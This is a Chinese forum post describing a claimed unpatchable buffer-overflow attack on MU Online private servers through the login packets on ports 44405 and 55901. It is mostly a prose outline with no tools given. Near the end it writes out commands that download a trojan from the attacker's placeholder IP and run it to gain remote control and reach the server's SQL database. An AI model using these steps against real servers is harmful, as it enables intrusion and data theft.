最恐怖的奇迹私服漏洞,目前无法修补,顶上去不要沉了!!!!
相信做过黑客的朋友都听说过"缓冲区溢出"攻击方式.不幸的是,由于服务端的问题,44405和55901这两个极其重要的端口无法抵挡这种攻击方式.
由于危害极大,下文中提到的工具都不会提供下载点.
下面看看攻击过程.
1.攻击入口.
MU客户端在登录时会发送一段数据到服务器端,也就是login数据.这段数据在服务器端并没有进行严格的检测而且没有加密的,于是,我们有机会将MU封包修改成畸形数据包发送给服务器端.我们可以很轻松的写个小程序模拟MU客户端"muclient.exe"的登录.
2.攻击脚本.
当服务器端收到畸形数据包后,溢出产生,此时CPU将跳入错误的地址,编写一个小汇编脚本,使CPU从堆栈返回后跳入指定区域,执行事先编好的代码.由于MU的封包长度有限,"muclient.exe"采取穷举法反复重试,直到成功获得CPU控制权.破解过和仅需1~3秒.在此期间,正常用户的登录装受影响,有可能长时间无反应及失去联系.很多MU玩家碰到过这种情况:登录时很难登进去,进入游戏后却很流畅,过一会儿下线再登,一切正常了,这就极有可能是该服受到攻击了.
3.执行指定命令.
到目前已获得CPU控制权,下一步就是让它转入高级命令的执行,mu服务器端里有现成的C语言写的system("cmd.exe")语句,这为黑客们提供了极大的方便,只要稍加修改就能转为执行任意命令行命令.当然,最有用处的是下面一句(为了安全起见下载命令用ftpget代替,黑客们都能意会这命令的真实名字):xxx.xxx.xxx.xxx就是你的主机IP.
ftpget -I get xxx.xxxx.xxx.xxx 木马.exe
再来一次,现在不执行ftpget了,执行刚才下载的那个木马.
muma.exe xxx.xxx.xxx.xxx
现在你的服务器成功的连接上受攻击的主机,你可以在服务器上打开控制台,畅游该机任何目录,包括奇迹私服SQL数据库.当然,我不会那么笨直接去开数据库,我会做个小脚本远程执行,那才叫方便.
该漏洞在44405和55901中都能使用,例如玩家对话等,凡是能输入文字的地方全都能用,无法修补